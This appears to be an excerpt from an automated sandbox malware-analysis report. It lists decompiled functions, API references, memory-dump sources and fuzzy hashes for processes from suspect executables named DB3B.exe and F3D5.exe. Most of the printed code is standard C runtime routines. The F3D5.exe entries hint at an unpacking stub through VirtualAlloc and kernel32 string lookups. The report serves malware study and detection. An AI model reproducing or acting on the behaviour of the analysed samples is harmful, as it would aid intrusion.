										__eflags = _t72;
										if(_t72 <= 0) {
											_v12 = 1;
										}
										goto L31;
									}
									__eflags = _t84;
									if(_t84 == 0) {
										L21:
										__eflags = _v12;
										_t98 = _t81;
										if(_v12 != 0) {
											_t75 = _t81;
											_t90 = _t75 % _v12;
											_t98 = _t98 - _t75 % _v12;
											__eflags = _t98;
										}
										_push(_t98);
										_push(_v8);
										_push(E0040FA20(_t90, _t98, _t100));
										_t74 = E0040F944(_t81, _t90, _t98, _t100, __eflags);
										_t101 = _t101 + 0xc;
										__eflags = _t74 - 0xffffffff;
										if(_t74 == 0xffffffff) {
											L36:
											 *(_t100 + 0xc) =  *(_t100 + 0xc) | 0x00000020;
											_t69 = _v16;
											goto L35;
										} else {
											_t88 = _t98;
											__eflags = _t74 - _t98;
											if(_t74 <= _t98) {
												_t88 = _t74;
											}
											_v8 = _v8 + _t88;
											_t81 = _t81 - _t88;
											__eflags = _t74 - _t98;
											if(_t74 < _t98) {
												goto L36;
											} else {
												L27:
												_t97 = _v16;
												goto L31;
											}
										}
									}
									_t77 = E0040C1FB(_t100);
									__eflags = _t77;
									if(_t77 != 0) {
										goto L34;
									}
									goto L21;
								}
								_t78 =  *(_t100 + 4);
								__eflags = _t78;
								if(__eflags == 0) {
									goto L18;
								}
								if(__eflags < 0) {
									_t48 = _t100 + 0xc;
									 *_t48 =  *(_t100 + 0xc) | 0x00000020;
									__eflags =  *_t48;
									goto L34;
								}
								_t99 = _t81;
								__eflags = _t81 - _t78;
								if(_t81 >= _t78) {
									_t99 = _t78;
								}
								E0040B350(_t81, _t99, _t100,  *_t100, _v8, _t99);
								 *(_t100 + 4) =  *(_t100 + 4) - _t99;
								 *_t100 =  *_t100 + _t99;
								_t101 = _t101 + 0xc;
								_t81 = _t81 - _t99;
								_v8 = _v8 + _t99;
								goto L27;
								L31:
								__eflags = _t81;
							} while (_t81 != 0);
							goto L32;
						}
					}
					L3:
					_t61 = E0040BFC1(_t105);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					 *_t61 = 0x16;
					E0040E744(_t90, 0, _t100);
					goto L4;
				}
			}

0x0040baaa
0x0040baba
0x0040bae0
0x00000000
0x0040bac1
0x0040bac1
0x0040bac4
0x0040bac6
0x0040bae7
0x0040baea
0x0040baec
0x00000000
0x00000000
0x0040baee
0x0040baf3
0x0040baf6
0x0040baf9
0x00000000
0x00000000
0x0040bafe
0x0040bb02
0x0040bb09
0x0040bb0c
0x0040bb0f
0x0040bb11
0x0040bb1b
0x0040bb13
0x0040bb16
0x0040bb16
0x0040bb22
0x0040bb24
0x0040bbe9
0x00000000
0x0040bb2a
0x0040bb2a
0x0040bb2d
0x0040bb2d
0x0040bb33
0x0040bb64
0x0040bb64
0x0040bb67
0x0040bbc0
0x0040bbc7
0x0040bbca
0x0040bbf5
0x0040bbf5
0x0040bbf7
0x00000000
0x0040bbfb
0x0040bbcc
0x0040bbcf
0x0040bbd2
0x0040bbd3
0x0040bbd6
0x0040bbd8
0x0040bbda
0x0040bbda
0x00000000
0x0040bbd8
0x0040bb69
0x0040bb6b
0x0040bb78
0x0040bb78
0x0040bb7c
0x0040bb7e
0x0040bb82
0x0040bb84
0x0040bb87
0x0040bb87
0x0040bb87
0x0040bb89
0x0040bb8a
0x0040bb94
0x0040bb95
0x0040bb9a
0x0040bb9d
0x0040bba0
0x0040bc03
0x0040bc03
0x0040bc07
0x00000000
0x0040bba2
0x0040bba2
0x0040bba4
0x0040bba6
0x0040bba8
0x0040bba8
0x0040bbaa
0x0040bbad
0x0040bbaf
0x0040bbb1
0x00000000
0x0040bbb3
0x0040bbb3
0x0040bbb3
0x00000000
0x0040bbb3
0x0040bbb1
0x0040bba0
0x0040bb6e
0x0040bb74
0x0040bb76
0x00000000
0x00000000
0x00000000
0x0040bb76
0x0040bb35
0x0040bb38
0x0040bb3a
0x00000000
0x00000000
0x0040bb3c
0x0040bbf1
0x0040bbf1
0x0040bbf1
0x00000000
0x0040bbf1
0x0040bb42
0x0040bb44
0x0040bb46
0x0040bb48
0x0040bb48
0x0040bb50
0x0040bb55
0x0040bb58
0x0040bb5a
0x0040bb5d
0x0040bb5f
0x00000000
0x0040bbe1
0x0040bbe1
0x0040bbe1
0x00000000
0x0040bb2a
0x0040bb24
0x0040bac8
0x0040bac8
0x0040bacd
0x0040bace
0x0040bacf
0x0040bad0
0x0040bad1
0x0040bad2
0x0040bad8
0x00000000
0x0040badd

APIs

__flush.LIBCMT ref: 0040BB6E
__fileno.LIBCMT ref: 0040BB8E
__locking.LIBCMT ref: 0040BB95
__flsbuf.LIBCMT ref: 0040BBC0

Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1

Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F

Memory Dump Source

Source File: 00000016.00000002.439507568.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.439543959.0000000000426000.00000040.00020000.sdmp Download File
Associated: 00000016.00000002.439565816.0000000000432000.00000040.00020000.sdmp Download File

Similarity

API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
String ID:
API String ID: 3240763771-0
Opcode ID: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
Instruction ID: 72eaa501f89e5d914343e0f007c81726c853b1270fdaa85e4c7363b387074608
Opcode Fuzzy Hash: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
Instruction Fuzzy Hash: B441A331A006059BDF249F6A88855AFB7B5EF80320F24853EE465B76C4D778EE41CB8C

Uniqueness

Uniqueness Score: -1.00%

Function 0041529F, Relevance: 6.1, APIs: 4, Instructions: 103
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041529F(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				signed int _v12;
				char _v20;
				char _t43;
				char _t46;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				int _t57;
				int _t58;
				signed short* _t59;
				short* _t60;
				int _t65;
				char* _t72;

				_t72 = _a8;
				if(_t72 == 0 || _a12 == 0) {
					L5:
					return 0;
				} else {
					if( *_t72 != 0) {
						E0040EC86( &_v20, _a16);
						_t43 = _v20;
						__eflags =  *(_t43 + 0x14);
						if( *(_t43 + 0x14) != 0) {
							_t46 = E004153D0( *_t72 & 0x000000ff,  &_v20);
							__eflags = _t46;
							if(_t46 == 0) {
								__eflags = _a4;
								__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t72, 1, _a4, 0 | _a4 != 0x00000000);
								if(__eflags != 0) {
									L10:
									__eflags = _v8;
									if(_v8 != 0) {
										_t53 = _v12;
										_t11 = _t53 + 0x70;
										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
										__eflags =  *_t11;
									}
									return 1;
								}
								L21:
								_t54 = E0040BFC1(__eflags);
								 *_t54 = 0x2a;
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t33 = _t54 + 0x70;
									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t33;
								}
								return _t54 | 0xffffffff;
							}
							_t56 = _v20;
							_t65 =  *(_t56 + 0xac);
							__eflags = _t65 - 1;
							if(_t65 <= 1) {
								L17:
								__eflags = _a12 -  *(_t56 + 0xac);
								if(__eflags < 0) {
									goto L21;
								}
								__eflags = _t72[1];
								if(__eflags == 0) {
									goto L21;
								}
								L19:
								_t57 =  *(_t56 + 0xac);
								__eflags = _v8;
								if(_v8 == 0) {
									return _t57;
								}
								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
								return _t57;
							}
							__eflags = _a12 - _t65;
							if(_a12 < _t65) {
								goto L17;
							}
							__eflags = _a4;
							_t58 = MultiByteToWideChar( *(_t56 + 4), 9, _t72, _t65, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t58;
							_t56 = _v20;
							if(_t58 != 0) {
								goto L19;
							}
							goto L17;
						}
						_t59 = _a4;
						__eflags = _t59;
						if(_t59 != 0) {
							 *_t59 =  *_t72 & 0x000000ff;
						}
						goto L10;
					} else {
						_t60 = _a4;
						if(_t60 != 0) {
							 *_t60 = 0;
						}
						goto L5;
					}
				}
			}

0x004152a9
0x004152b0
0x004152c7
0x00000000
0x004152b7
0x004152b9
0x004152d3
0x004152d8
0x004152db
0x004152de
0x00415307
0x0041530e
0x00415310
0x00415391
0x004153ac
0x004153ae
0x004152ee
0x004152ee
0x004152f1
0x004152f3
0x004152f6
0x004152f6
0x004152f6
0x004152f6
0x00000000
0x004152fc
0x00415370
0x00415370
0x00415375
0x0041537b
0x0041537e
0x00415380
0x00415383
0x00415383
0x00415383
0x00415383
0x00000000
0x00415387
0x00415312
0x00415315
0x0041531b
0x0041531e
0x00415345
0x00415348
0x0041534e
0x00000000
0x00000000
0x00415350
0x00415353
0x00000000
0x00000000
0x00415355
0x00415355
0x0041535b
0x0041535e
0x004152cc
0x004152cc
0x00415367
0x00000000
0x00415367
0x00415320
0x00415323
0x00000000
0x00000000
0x00415327
0x00415338
0x0041533e
0x00415340
0x00415343
0x00000000
0x00000000
0x00000000
0x00415343
0x004152e0
0x004152e3
0x004152e5
0x004152eb
0x004152eb
0x00000000
0x004152bb
0x004152bb
0x004152c0
0x004152c4
0x004152c4
0x00000000
0x004152c0
0x004152b9

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004152D3
__isleadbyte_l.LIBCMT ref: 00415307
MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 00415338
MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 004153A6

Memory Dump Source

Source File: 00000016.00000002.439507568.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.439543959.0000000000426000.00000040.00020000.sdmp Download File
Associated: 00000016.00000002.439565816.0000000000432000.00000040.00020000.sdmp Download File

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
Instruction ID: 094900ada7e667e90e346a2540d450e67f5821ec0926a3c2ae07879bc245b0d1
Opcode Fuzzy Hash: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
Instruction Fuzzy Hash: 1831A032A00649EFDB20DFA4C8809EE7BB5EF41350B1885AAE8659B291D374DD80DF59

Uniqueness

Uniqueness Score: -1.00%

Function 004134DB, Relevance: 6.0, APIs: 4, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004134DB(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;
				void* _t28;

				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E00412DCC(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t34 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E00412EBC(_t28, _a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E004133E1(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E00413326(_t28, _t34, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}

0x004134e0
0x004134e6
0x00413559
0x00000000
0x004134ed
0x004134ed
0x004134f0
0x0041350b
0x0041350e
0x0041352e
0x00413540
0x00413510
0x00413510
0x00413513
0x00000000
0x00413515
0x00413527
0x00413527
0x00413513
0x0041355e
0x00413562
0x004134f2
0x0041350a
0x0041350a
0x004134f0

APIs

__cftof_l.LIBCMT ref: 00413501

Part of subcall function 00413326: __fltout2.LIBCMT ref: 00413352

__cftog_l.LIBCMT ref: 00413527
__cftoe_l.LIBCMT ref: 00413559

Memory Dump Source

Source File: 00000016.00000002.439507568.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.439543959.0000000000426000.00000040.00020000.sdmp Download File
Associated: 00000016.00000002.439565816.0000000000432000.00000040.00020000.sdmp Download File

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction ID: bfd0e68975b3765f24e543ba70b005e9871d43ed2f52156b65e62ceec70126f9
Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction Fuzzy Hash: DA117E7200014EBBCF125E85CC418EE3F27BF18755B58841AFE2858130D73BCAB2AB89

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: DB3B.exe PID: 5536 Parent PID: 3388 DB3B.exeCOMMON

Executed Functions

Function 03DE4E18, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetConsoleWindow.KERNELBASE ref: 03DE4E7F

Memory Dump Source

Source File: 0000001A.00000002.577696297.0000000003DE0000.00000040.00000001.sdmp, Offset: 03DE0000, based on PE: false

Similarity

API ID: ConsoleWindow
String ID:
API String ID: 2863861424-0
Opcode ID: ceb65e61da18892870f38b37b2dfbc130ceda1ee5e4bf862ef08eea964a77321
Instruction ID: 153b98002a3971c93fcbcf2e9fe969dccd5aeca66261f3c11c61f5df04a1b920
Opcode Fuzzy Hash: ceb65e61da18892870f38b37b2dfbc130ceda1ee5e4bf862ef08eea964a77321
Instruction Fuzzy Hash: CD11E6B1D003498FCB14DFA9C5457EEFBF5AB48318F24882AC419A7650D779A945CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 03DE4E20, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetConsoleWindow.KERNELBASE ref: 03DE4E7F

Memory Dump Source

Source File: 0000001A.00000002.577696297.0000000003DE0000.00000040.00000001.sdmp, Offset: 03DE0000, based on PE: false

Similarity

API ID: ConsoleWindow
String ID:
API String ID: 2863861424-0
Opcode ID: 730f94e87d3a16ddc69c33b67b47cabb9dfd5ff80ffc3032eaf19cbc94fb677c
Instruction ID: 62b20e644b6a42c394ab7adcabf706f2e6eadb6d3f21000330d4904c8fcdadfa
Opcode Fuzzy Hash: 730f94e87d3a16ddc69c33b67b47cabb9dfd5ff80ffc3032eaf19cbc94fb677c
Instruction Fuzzy Hash: 771106B1D003498FCB14DFAAC9457DFFBF4AB48318F248829C519A7640DB79A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 01CDD4DC, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.531321797.0000000001CDD000.00000040.00000001.sdmp, Offset: 01CDD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7b81346239f4e72f5373e7ddcb2cfbd76decb2a4e895f27bc9f885c3897c990
Instruction ID: d3ab236aa65a2cd467adba24231eb900ee7adedb4cf8913d909a7306f3b428f3
Opcode Fuzzy Hash: f7b81346239f4e72f5373e7ddcb2cfbd76decb2a4e895f27bc9f885c3897c990
Instruction Fuzzy Hash: 3C2128B1904344DFDB05DF94D9C0B37BF65FB88328F2085A9E9060B296D336D955CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 01CDD3F0, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.531321797.0000000001CDD000.00000040.00000001.sdmp, Offset: 01CDD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01d4b83ed4e9af3557c7879e124db00f4d1be93a205709f1db285798999a143b
Instruction ID: 46a4821bdb2ff2ef158faeae3a78f7363165d2acc69775ce3158c2b86277d5da
Opcode Fuzzy Hash: 01d4b83ed4e9af3557c7879e124db00f4d1be93a205709f1db285798999a143b
Instruction Fuzzy Hash: 14210671904240DFDB11DF94D9C0B66BF65FB88324F20C5ADE90A0B286C336E955CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 01CDD4D7, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.531321797.0000000001CDD000.00000040.00000001.sdmp, Offset: 01CDD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 002824b7dc35117c61ad8ba7c960ae22855c4127cd946539e23bbefe9eb854b6
Instruction ID: cb370bd5f019fed94fc26213439a708a06f9231d867c34a82c8c383c67d6c8cd
Opcode Fuzzy Hash: 002824b7dc35117c61ad8ba7c960ae22855c4127cd946539e23bbefe9eb854b6
Instruction Fuzzy Hash: DA11D3B6804280CFCB16CF54D5C4B26BF72FB88324F24C6A9D9090B256C336D55ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 01CDD3EB, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.531321797.0000000001CDD000.00000040.00000001.sdmp, Offset: 01CDD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 002824b7dc35117c61ad8ba7c960ae22855c4127cd946539e23bbefe9eb854b6
Instruction ID: 730475b48050fbfbf93ba987917fb88b10e7b1cff9b78f8bc55eb20b60c289b5
Opcode Fuzzy Hash: 002824b7dc35117c61ad8ba7c960ae22855c4127cd946539e23bbefe9eb854b6
Instruction Fuzzy Hash: 7411D376804280CFCB12CF54D9C4B66BF71FB84324F24C6A9D9090B657C336E556CBA2

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: F3D5.exe PID: 5064 Parent PID: 3388 F3D5.exeCOMMON

Executed Functions

Function 0284003C, Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0284024D

Strings

kernel32.dll, xrefs: 0284008F, 02840095
cess, xrefs: 0284018D

Memory Dump Source

Source File: 0000001E.00000002.444469529.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: 1bc5c981d6fea912fcc7dcc340e60fde74e519195c6ec5c7e407c243dd4fdd56
Instruction ID: 6e8e3d449ddf539915555aee0c03ac19adb441062514c735919c615cb1cd16dc
Opcode Fuzzy Hash: 1bc5c981d6fea912fcc7dcc340e60fde74e519195c6ec5c7e407c243dd4fdd56
Instruction Fuzzy Hash: 73526A78A01229DFDB64CF58C984BADBBB1BF09304F1480D9E94DAB351DB30AA85DF15

Uniqueness

Uniqueness Score: -1.00%

Function 02840DF8, Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00000400,?,?,02840223,?,?), ref: 02840E02
SetErrorMode.KERNELBASE(00000000,?,?,02840223,?,?), ref: 02840E07

Memory Dump Source

Source File: 0000001E.00000002.444469529.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 83f73281c6373cb1b0d979f9cdbeb9ab22e7893a108bcdc6e9027c46053fbebf
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: BED0123514512C77D7402E94DC09BCE7B1C9F05B67F008011FB0DD9181CB70995046E5

Uniqueness

Uniqueness Score: -1.00%

Function 02840920, Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(000000FF,00000000), ref: 02840929

Memory Dump Source

Source File: 0000001E.00000002.444469529.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: d55294ef36f743dc8c36dbb98379860f5cb269746586b3705c3618cb501ead5b
Instruction ID: cbc9a4f874b6b2558ae3724d98f76a642fb5b4724ccee73b573b27f83fb950bf
Opcode Fuzzy Hash: d55294ef36f743dc8c36dbb98379860f5cb269746586b3705c3618cb501ead5b
Instruction Fuzzy Hash: 9490047034415411DC3035DC0C11F0504015755735F3047107130FD1F4DC40DF401115

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 02850472, Relevance: .1, Instructions: 144COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.444469529.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d42c58614a3a1302500ec64a4ed311cd8a054c97570889aff67bf1e6ad34597
Instruction ID: cc50f22aa348ad6f52f95f86cf2966187ac7ce43cb0f6c62aaf69ac75fe20a38
Opcode Fuzzy Hash: 9d42c58614a3a1302500ec64a4ed311cd8a054c97570889aff67bf1e6ad34597
Instruction Fuzzy Hash: D75190B99013258FEB18CF58DA817AEBBF0FB48318F24847AD909EB661D374D940CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0285CD7C, Relevance: 19.6, APIs: 13, Instructions: 113COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0285CDB5
___free_lconv_mon.LIBCMT ref: 0285CDC0

Part of subcall function 0285C959: _free.LIBCMT ref: 0285C976
Part of subcall function 0285C959: _free.LIBCMT ref: 0285C988
Part of subcall function 0285C959: _free.LIBCMT ref: 0285C99A
Part of subcall function 0285C959: _free.LIBCMT ref: 0285C9AC
Part of subcall function 0285C959: _free.LIBCMT ref: 0285C9BE
Part of subcall function 0285C959: _free.LIBCMT ref: 0285C9D0
Part of subcall function 0285C959: _free.LIBCMT ref: 0285C9E2
Part of subcall function 0285C959: _free.LIBCMT ref: 0285C9F4
Part of subcall function 0285C959: _free.LIBCMT ref: 0285CA06
Part of subcall function 0285C959: _free.LIBCMT ref: 0285CA18
Part of subcall function 0285C959: _free.LIBCMT ref: 0285CA2A
Part of subcall function 0285C959: _free.LIBCMT ref: 0285CA3C
Part of subcall function 0285C959: _free.LIBCMT ref: 0285CA4E

_free.LIBCMT ref: 0285CDD7
_free.LIBCMT ref: 0285CDEC
_free.LIBCMT ref: 0285CDF7
_free.LIBCMT ref: 0285CE19
_free.LIBCMT ref: 0285CE2C
_free.LIBCMT ref: 0285CE3A
_free.LIBCMT ref: 0285CE45
_free.LIBCMT ref: 0285CE7D
_free.LIBCMT ref: 0285CE84
_free.LIBCMT ref: 0285CEA1
_free.LIBCMT ref: 0285CEB9

Memory Dump Source

Source File: 0000001E.00000002.444469529.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false

Similarity

API ID: _free$___free_lconv_mon
String ID:
API String ID: 3658870901-0
Opcode ID: 6e6829f945fb38eee2558471d67fcd828d25534c293ea5dfe52bf9b8956759b2
Instruction ID: 78e72dc5d04342114fbd803974b42e4a8589bd7c7f684046f86a5cb1f1d525db
Opcode Fuzzy Hash: 6e6829f945fb38eee2558471d67fcd828d25534c293ea5dfe52bf9b8956759b2
Instruction Fuzzy Hash: 3E313E3E600325AFEB21AA39D844B5677EABF00315F50442AE89DD7590EF75F940CF61

Uniqueness

Uniqueness Score: -1.00%

Function 0285702A, Relevance: 15.1, APIs: 10, Instructions: 69COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 02857040
_free.LIBCMT ref: 0285704C
_free.LIBCMT ref: 02857057
_free.LIBCMT ref: 02857062
_free.LIBCMT ref: 0285706D
_free.LIBCMT ref: 02857078
_free.LIBCMT ref: 02857083
_free.LIBCMT ref: 0285708E
_free.LIBCMT ref: 02857099
_free.LIBCMT ref: 028570A7

Memory Dump Source

Source File: 0000001E.00000002.444469529.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 1fcfb7d0ffea5263bcad58445cfe15267b6c93876006fca3dd3a00027fdf9090
Instruction ID: 198ec696264087d7752a672a0fb122842c4e4fcfd2bcf9f30ed0ec7bee9d0747
Opcode Fuzzy Hash: 1fcfb7d0ffea5263bcad58445cfe15267b6c93876006fca3dd3a00027fdf9090
Instruction Fuzzy Hash: 7421877A900128BFCB41EF98C844DDE7BB9BF18341F51416AA959DB120FB35EA548F81

Uniqueness

Uniqueness Score: -1.00%

Function 0285C194, Relevance: 12.2, APIs: 8, Instructions: 203COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 0285C1BE
_free.LIBCMT ref: 0285C297
_free.LIBCMT ref: 0285C2C4

Memory Dump Source

Source File: 0000001E.00000002.444469529.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false

Similarity

API ID: _free$___from_strstr_to_strchr
String ID:
API String ID: 3409252457-0
Opcode ID: 77043633401ad202eb27ead07ccf0404420d1bb3c6a2c2d34e07e4cc7096c80c
Instruction ID: b1fb0d5f70e7866cf59ed625a0aa1ccc81c417f21085bdbe84cdd7b6ba79ae04
Opcode Fuzzy Hash: 77043633401ad202eb27ead07ccf0404420d1bb3c6a2c2d34e07e4cc7096c80c
Instruction Fuzzy Hash: 8D51E67D904339AFDB24AFA88880ABD7BB9AF01718B08416FDD58D7291EB358540CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0285CAF8, Relevance: 10.6, APIs: 7, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 0285CAC0: _free.LIBCMT ref: 0285CAE5

_free.LIBCMT ref: 0285CB46
_free.LIBCMT ref: 0285CB51
_free.LIBCMT ref: 0285CB5C
_free.LIBCMT ref: 0285CBB0
_free.LIBCMT ref: 0285CBBB
_free.LIBCMT ref: 0285CBC6
_free.LIBCMT ref: 0285CBD1

Memory Dump Source

Source File: 0000001E.00000002.444469529.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 17f53bcb001aa0cf27f4b28cdacd85efe4fe4569033449001c41b86b803b0e8a
Instruction ID: 951dbddcc31b1deed2b09da07b39de0a50f4128004a705572d31a29843ab6f0b
Opcode Fuzzy Hash: 17f53bcb001aa0cf27f4b28cdacd85efe4fe4569033449001c41b86b803b0e8a
Instruction Fuzzy Hash: F51124BE540B28BED921F774CC45FCB7F9E6F04700F84482ABA9AE6050EA65F5148F52

Uniqueness

Uniqueness Score: -1.00%

Function 0285AA9A, Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 301COMMON

Download Yara Rule

Strings

, xrefs: 0285AD22

Memory Dump Source

Source File: 0000001E.00000002.444469529.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false

Similarity

API ID:
String ID:
API String ID: 0-3907804496
Opcode ID: cbdbc7ccb3bc7d96a1afbaa3de7abe9f4ef0bf1d3a905154f8dd188e560e571f
Instruction ID: 435c7dab25b71c27545a889670b9440f0ba287531b2b6eda21282889fb0c758b
Opcode Fuzzy Hash: cbdbc7ccb3bc7d96a1afbaa3de7abe9f4ef0bf1d3a905154f8dd188e560e571f
Instruction Fuzzy Hash: 11C1C17CA042699FDF19EF98C8C0BADBBB1AF49314F044269ED49D7291D730A942CF61

Uniqueness

Uniqueness Score: -1.00%

Function 0285CA57, Relevance: 7.5, APIs: 5, Instructions: 40COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0285CA6F
_free.LIBCMT ref: 0285CA81
_free.LIBCMT ref: 0285CA93
_free.LIBCMT ref: 0285CAA5
_free.LIBCMT ref: 0285CAB7

Memory Dump Source

Source File: 0000001E.00000002.444469529.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 5d0a5859f4b37fc9e185064ffee58ad4f855eb3b6b6ae4a5b76935e3f7635b51
Instruction ID: 38e71ab6fdab98dcbbd186a704dbe3df2ab60199bee78761fe75e2d740a1ae06
Opcode Fuzzy Hash: 5d0a5859f4b37fc9e185064ffee58ad4f855eb3b6b6ae4a5b76935e3f7635b51
Instruction Fuzzy Hash: 52F0FFBE504334BB8625EB68E8C9C167BDEBA04714794191AF84CD7900EB38F8904EE4

Uniqueness

Uniqueness Score: -1.00%

Function 0285B123, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 206COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0285B2BD

Strings

*?, xrefs: 0285B166

Memory Dump Source

Source File: 0000001E.00000002.444469529.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false

Similarity

API ID: _free
String ID: *?
API String ID: 269201875-2564092906
Opcode ID: 4a6e40b0c49d7c0310f5f242bb9f08e34da1873dbea1c6ed18f33a9ac217de90
Instruction ID: 921fe63dfe2b25e4806eee708ae6b6e5b79af5337c85ce50d2fd9c6b401ace9f
Opcode Fuzzy Hash: 4a6e40b0c49d7c0310f5f242bb9f08e34da1873dbea1c6ed18f33a9ac217de90
Instruction Fuzzy Hash: 38613D79D00229AFDB14CFA8C8815EDFBF5EF58314B14816AD859F7304E775AE418B90

Uniqueness

Uniqueness Score: -1.00%

Function 02850C90, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 02850CCF
__IsNonwritableInCurrentImage.LIBCMT ref: 02850D83

Strings

csm, xrefs: 02850D6D
csm, xrefs: 02850E01

Memory Dump Source

